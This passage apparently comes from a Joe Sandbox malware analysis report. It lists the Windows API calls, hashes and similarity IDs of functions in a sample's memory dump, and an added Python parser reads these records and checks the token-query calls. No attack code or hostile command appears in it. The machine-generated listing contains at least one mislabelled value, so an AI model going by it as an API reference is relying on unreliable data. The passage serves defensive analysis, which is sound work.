                                                      • Opcode Fuzzy Hash: 06180584bdae67dcdcf5f591874cf1972bf2a749dcf3420acb4303fb59246ba2
                                                      • Instruction Fuzzy Hash: 87319C71900219EBDB14CF68D94DA9E7BB5EB49315F108319F929AA2D0C3B0D968DB90
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 001AB804
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 001AB829
                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 001AB841
                                                      • GetSystemMetrics.USER32(00000004), ref: 001AB86A
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0019155C,00000000), ref: 001AB888
                                                      Similarity
                                                      • API ID: Window$Long$MetricsSystem
                                                      • String ID:
                                                      • API String ID: 2294984445-0
                                                      • Opcode ID: af9804e53bcb1fd7ffc2de8a950c01653262be97e4d43412d30110580d70845e
                                                      • Instruction ID: b643e425036b906de6d9b74e0151b809600635f6fec6704321bd097201a99d36
                                                      • Opcode Fuzzy Hash: af9804e53bcb1fd7ffc2de8a950c01653262be97e4d43412d30110580d70845e
                                                      • Instruction Fuzzy Hash: 6821E5359182A5AFCB249F7CDC88B6A37A8FB06320F114738F921D75E2D3348860CB90
                                                      APIs
                                                      • IsWindow.USER32(00000000), ref: 00196159
                                                      • GetForegroundWindow.USER32 ref: 00196170
                                                      • GetDC.USER32(00000000), ref: 001961AC
                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 001961B8
                                                      • ReleaseDC.USER32(00000000,00000003), ref: 001961F3
                                                      Similarity
                                                      • API ID: Window$ForegroundPixelRelease
                                                      • String ID:
                                                      • API String ID: 4156661090-0
                                                      • Opcode ID: 116c472aea96ab01d6bf50680eb10c6ea3e157a8cc8e85770abd4bfc5af38bd0
                                                      • Instruction ID: 7865b0c014ba60f3af7e5257e1b0c9356c1993ae54b0e3839abdbc8d0511dbc9
                                                      • Opcode Fuzzy Hash: 116c472aea96ab01d6bf50680eb10c6ea3e157a8cc8e85770abd4bfc5af38bd0
                                                      • Instruction Fuzzy Hash: 4E218475A002049FDB14EF65DD84A9AB7F5EF98350F048479F94AD7662CB30AD41CB90
                                                      APIs
                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00121729
                                                      • SelectObject.GDI32(?,00000000), ref: 00121738
                                                      • BeginPath.GDI32(?), ref: 0012174F
                                                      • SelectObject.GDI32(?,00000000), ref: 00121778
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: e30a8c02c7b6ebcf173f729879f92fb8cfb5bfe550326abcf14bc807c18807b0
                                                      • Instruction ID: e511b86e7b25858e243b293d1e5724dc74cd66e6c6993ae1eb9e2809a3a317fb
                                                      • Opcode Fuzzy Hash: e30a8c02c7b6ebcf173f729879f92fb8cfb5bfe550326abcf14bc807c18807b0
                                                      • Instruction Fuzzy Hash: 7121AF30804258FBEB11DFA4FC88F6E7BA9FB64361F144216F8159A5E0D77198E2CB90
                                                      APIs
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: 1898697b268d90c103512e8b8c8cb8ceb70181bd0ad3152d5fbdf5fc9ef7b7fe
                                                      • Instruction ID: 241fe9b8a1864f105ad34444bbacf00cd390f71fcd83245ca35528ef245f97fa
                                                      • Opcode Fuzzy Hash: 1898697b268d90c103512e8b8c8cb8ceb70181bd0ad3152d5fbdf5fc9ef7b7fe
                                                      • Instruction Fuzzy Hash: 0201B572A401157BD3146611ED82FFB777CAB70394F15802EFE1A96746F7A0DE2182E2
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00185075
                                                      • __beginthreadex.LIBCMT ref: 00185093
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 001850A8
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001850BE
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001850C5
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                      • String ID:
                                                      • API String ID: 3824534824-0
                                                      • Opcode ID: 65bc38b3fc3a33849b271b3d43c6d46db3d54a9de79f1832f397b7f8eb180099
                                                      • Instruction ID: ebe0a0e40bbd8f020062779a79eac24ffe5b49caf794eb6a7a1453cdcdcc6d5e
                                                      • Opcode Fuzzy Hash: 65bc38b3fc3a33849b271b3d43c6d46db3d54a9de79f1832f397b7f8eb180099
                                                      • Instruction Fuzzy Hash: A411E572908749ABD7019BE89C44AAF7BADEB49320F140355F915D76A0D7718A808BE0
                                                      APIs
                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00178E3C
                                                      • GetLastError.KERNEL32(?,00178900,?,?,?), ref: 00178E46
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00178900,?,?,?), ref: 00178E55
                                                      • HeapAlloc.KERNEL32(00000000,?,00178900,?,?,?), ref: 00178E5C
                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00178E73
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 842720411-0
                                                      • Opcode ID: 845f0fd37ebd620f29943eb56c34e06f6a77c3c19f969c974d54c96592715d5b
                                                      • Instruction ID: 205fd39b4fd675de3aa9a91b20fab726d818ca90de2820334217914b3278000c
                                                      • Opcode Fuzzy Hash: 845f0fd37ebd620f29943eb56c34e06f6a77c3c19f969c974d54c96592715d5b
                                                      • Instruction Fuzzy Hash: 240169B0290204BFDB214FAADC8DD6B7BBDEF8A354B104629F849C2220DF31DC50CA60
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0018581B
                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00185829
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00185831
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0018583B
                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00185877
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      • Opcode ID: 1852203ce360db1f95419b88b57e868c68f1373557b2f5ecd848796bdff0dda4
                                                      • Instruction ID: c4fbe120d9f8db949507e27fed45da0fcc91c26d1d106ac2d3369cac605273f9
                                                      • Opcode Fuzzy Hash: 1852203ce360db1f95419b88b57e868c68f1373557b2f5ecd848796bdff0dda4
                                                      • Instruction Fuzzy Hash: 8C016D31C01A1DDBCF04AFEAD8489EEBB79FB0D711F414196E401B2140DB30D6A4CBA1
                                                      APIs
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00177C62,80070057,?,?,?,00178073), ref: 00177D45
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00177C62,80070057,?,?), ref: 00177D60
                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00177C62,80070057,?,?), ref: 00177D6E
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00177C62,80070057,?), ref: 00177D7E
                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00177C62,80070057,?,?), ref: 00177D8A
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      • String ID:
                                                      • API String ID: 3897988419-0
                                                      • Opcode ID: 459a99ecb652f776a0c80cae216e2dd2cef346d16734eadd902ed631c67c46b5
                                                      • Instruction ID: ecc954300f62e43af2e99374abe83031dd51dd4ea55c2a9b4d1942d95d8e5e81
                                                      • Opcode Fuzzy Hash: 459a99ecb652f776a0c80cae216e2dd2cef346d16734eadd902ed631c67c46b5
                                                      • Instruction Fuzzy Hash: 5B017172A05214ABDB214F94DC44BAA7BBDEF48791F158114FD0CD6260E771DE40CBE0
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00178CDE
                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00178CE8
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00178CF7
                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00178CFE
                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00178D14
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: d9ea9d352081d668f96161511592e5aa429a2f8dddb134f076830eec24e8001d
                                                      • Instruction ID: ead0c1f15cf50c1341e719eba903981930ceecef81c4c72d9b0a4d01ee8a024b
                                                      • Opcode Fuzzy Hash: d9ea9d352081d668f96161511592e5aa429a2f8dddb134f076830eec24e8001d
                                                      • Instruction Fuzzy Hash: D6F04F75244204AFEB221FE5DCCDE673BADEF4D7A4B108625F949C6190CB61DC81DB60
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00178D3F
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00178D49
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00178D58
                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00178D5F
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00178D75
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: 15f0c7ace405a1f54f5f13087b634c3841928d02c2d8a76d9e937b753744726d
                                                      • Instruction ID: f3f7b17e2d5906f08c8839acdc60b240a04d2b51cd14fb9e839fb2e09f6519ba
                                                      • Opcode Fuzzy Hash: 15f0c7ace405a1f54f5f13087b634c3841928d02c2d8a76d9e937b753744726d
                                                      • Instruction Fuzzy Hash: 14F04F71290204AFEB221FA9EC8CF673BADEF49794F144215F949C6190DB61DD81DB60
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 0017CD90
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0017CDA7
                                                      • MessageBeep.USER32(00000000), ref: 0017CDBF
                                                      • KillTimer.USER32(?,0000040A), ref: 0017CDDB
                                                      • EndDialog.USER32(?,00000001), ref: 0017CDF5
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      • Opcode ID: 0accb9a548423e2f7caa905c4c262bcdb084a57124c78894816fccc621674264
                                                      • Instruction ID: fb830bd1f22ad21480b86da98f0d8a51da459b6ae04b32428be8b1e6e6a69e33
                                                      • Opcode Fuzzy Hash: 0accb9a548423e2f7caa905c4c262bcdb084a57124c78894816fccc621674264
                                                      • Instruction Fuzzy Hash: 1C018630500704ABEB359B60DD4EBA77B78FB08705F00476DF596A14E1DBF0A9948BC0
                                                      APIs
                                                      • EndPath.GDI32(?), ref: 0012179B
                                                      • StrokeAndFillPath.GDI32(?,?,0015BBC9,00000000,?), ref: 001217B7
                                                      • SelectObject.GDI32(?,00000000), ref: 001217CA
                                                      • DeleteObject.GDI32 ref: 001217DD
                                                      • StrokePath.GDI32(?), ref: 001217F8
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      • Opcode ID: ff620f2d1e304be56d3ae06a0d90d38184a45c3b2ef224f876e396c0168c0f65
                                                      • Instruction ID: 064a3ca2d236505d8d3d0190e044dd047afb632bfb5c0147aa45045c9c80e35e
                                                      • Opcode Fuzzy Hash: ff620f2d1e304be56d3ae06a0d90d38184a45c3b2ef224f876e396c0168c0f65
                                                      • Instruction Fuzzy Hash: C2F0E130008248FBEB269F95EC8CB5D3FA4A764365F148314F429599F0D73149E5DF10
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0018CA75
                                                      • CoCreateInstance.OLE32(001B3D3C,00000000,00000001,001B3BAC,?), ref: 0018CA8D
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                      • CoUninitialize.OLE32 ref: 0018CCFA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                      • String ID: .lnk
                                                      • API String ID: 2683427295-24824748
                                                      • Opcode ID: 7c857d35f89aa43a403b858a1b46db42b866a505bf24dfb13c2a36049837d10a
                                                      • Instruction ID: 2972cb2a7fb16e4271e3685af18d3a07ebaad73a943360676736a063e0809824
                                                      • Opcode Fuzzy Hash: 7c857d35f89aa43a403b858a1b46db42b866a505bf24dfb13c2a36049837d10a
                                                      • Instruction Fuzzy Hash: 22A13C71104215AFD300EF64DC91EABB7E8FFA4714F40491CF15597292EB70EA49CBA2
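As an added example, not code from the Joe Sandbox report or its IDA plugin, the following Python parser reads function records in the exact layout used in this section: it splits the listing at each "APIs" header, collects the call chain with its ref addresses (marking "Part of subcall function" lines separately), keeps the Strings and Similarity fields, and then checks two things a reviewer wants from these records. First, the query-size / HeapAlloc / query-again shape visible in the GetTokenInformation and GetUserObjectSecurity routines above. Second, the TOKEN_INFORMATION_CLASS value actually passed: it is decoded from the numeric second argument because in winnt.h TokenIntegrityLevel is 25 and 3 is TokenPrivileges, so the inline "(TokenIntegrityLevel)" label next to 00000003 in the record at ref 00178D3F should not be taken at face value. The sample text is constructed from three records on this page (the two GetTokenInformation routines and the CoInitialize/CoCreateInstance routine) with their dump-source lines omitted; the function and field names in the parser are my own.

```python
import re

# Constructed sample: three of the function records listed above (the two
# GetTokenInformation routines and the CoInitialize/CoCreateInstance routine),
# copied as extracted, with the dump-source lines left out for brevity.
SAMPLE = """\
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00178CDE
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00178CE8
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00178CF7
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00178CFE
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00178D14
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00178D3F
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00178D49
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00178D58
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00178D5F
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00178D75
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
APIs
• CoInitialize.OLE32(00000000), ref: 0018CA75
• CoCreateInstance.OLE32(001B3D3C,00000000,00000001,001B3BAC,?), ref: 0018CA8D
  • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
• CoUninitialize.OLE32 ref: 0018CCFA
Strings
Similarity
• API ID: CreateInitializeInstanceUninitialize_memmove
• String ID: .lnk
• API String ID: 2683427295-24824748
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• Func.MODULE(args), ref: ADDR"; args may nest parentheses or be absent entirely.
API_RE = re.compile(r"^•\s*(\S+?)\.([A-Z0-9]+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-F]+)\s*$")
SUBCALL_RE = re.compile(r"^•\s*Part of subcall function [0-9A-F]+:\s*(.*)$")
FIELD_RE = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")
# TOKEN_INFORMATION_CLASS values from winnt.h (only the ones decoded here).
TOKEN_CLASSES = {1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges", 4: "TokenOwner",
                 18: "TokenElevationType", 20: "TokenElevation", 25: "TokenIntegrityLevel"}

def parse_records(text):
    """Split the report text into one dict per function record ("APIs" block)."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                rec = {"apis": [], "strings": [], "fields": {}}
                records.append(rec)
            section = line
        elif not line or rec is None:
            continue
        elif section == "APIs":
            sub = SUBCALL_RE.match(line)
            m = API_RE.match("• " + sub.group(1) if sub else line)
            if m:
                rec["apis"].append({"func": m.group(1), "module": m.group(2), "args": m.group(3) or "",
                                    "ref": m.group(4), "subcall": sub is not None})
        elif section == "Strings":
            rec["strings"].append(line.lstrip("• "))
        else:
            m = FIELD_RE.match(line)
            if m:
                rec["fields"][m.group(1)] = m.group(2)
    return records

def api_sequence(rec):
    """Direct calls in address order (subcall annotations excluded)."""
    return [a["func"] for a in rec["apis"] if not a["subcall"]]

def size_probe_api(rec):
    """Name of the API called twice with a HeapAlloc in between: the query-size,
    allocate, query-again shape of the GetTokenInformation routines; else None."""
    seq = api_sequence(rec)
    for i, func in enumerate(seq):
        if func in seq[i + 1:] and "HeapAlloc" in seq[i + 1:seq.index(func, i + 1)]:
            return func
    return None

def token_info_classes(rec):
    """(ref, class value, winnt.h name) for each GetTokenInformation call, taken
    from the numeric second argument rather than the sandbox's inline label."""
    out = []
    for a in rec["apis"]:
        parts = a["args"].split(",")
        if a["func"] == "GetTokenInformation" and len(parts) > 1:
            m = re.match(r"^([0-9A-F]+)", parts[1])
            if m:
                cls = int(m.group(1), 16)
                out.append((a["ref"], cls, TOKEN_CLASSES.get(cls, "unknown")))
    return out
```

Records sharing an API String ID (both GetTokenInformation routines report 44706859-0) can be grouped on `rec["fields"]["API String ID"]` to spot duplicated helper code across the binary, and the `String ID` field (`.lnk` for the COM routine) is what ties the CoCreateInstance call to shortcut handling.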
                                                      APIs
                                                        • Part of subcall function 00140FE6: std::exception::exception.LIBCMT ref: 0014101C
                                                        • Part of subcall function 00140FE6: __CxxThrowException@8.LIBCMT ref: 00141031
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 00131680: _memmove.LIBCMT ref: 001316DB
                                                      • __swprintf.LIBCMT ref: 0012E598
                                                      Strings
                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0012E431
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                      • API String ID: 1943609520-557222456
                                                      • Opcode ID: a136b81df5213781fab21002f362be4a11da2325e3faa90859bf9722c9f937ba
                                                      • Instruction ID: 146b7fb584addc942300ebc597d5c00fc134210cdbf803319981e0485ede9f53
                                                      • Opcode Fuzzy Hash: a136b81df5213781fab21002f362be4a11da2325e3faa90859bf9722c9f937ba
                                                      • Instruction Fuzzy Hash: C691AE71118311AFC718EF24D895C6EB7E9EFA5700F40491DF486972A1EB30EE54CB92
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 001452CD
                                                        • Part of subcall function 00150320: __87except.LIBCMT ref: 0015035B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__87except__start
                                                      • String ID: pow
                                                      • API String ID: 2905807303-2276729525
                                                      • Opcode ID: 940e33512a100525062d112fa857e3e81b28059b8a5f30bfed52d500d172174f
                                                      • Instruction ID: f58b0fb1c16d86a695174e0d738aa5d0c3336346d4543d9489eeac211cf57108
                                                      • Opcode Fuzzy Hash: 940e33512a100525062d112fa857e3e81b28059b8a5f30bfed52d500d172174f
                                                      • Instruction Fuzzy Hash: D4519D61A09A01C7CB166F54C94176E2B95AB04B52F208D59E8E18E6B7EFB48CCCDA42
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #$+
                                                      • API String ID: 0-2552117581
                                                      • Opcode ID: 53db46a055c03380cdc48ee5a41d7ab87af9c5cb1a5c39d5aa47c799a180cb09
                                                      • Instruction ID: 40d7b45d35e4a2e03987c12c9dcc4d48387de7976fccdebb9808a4822ecec64e
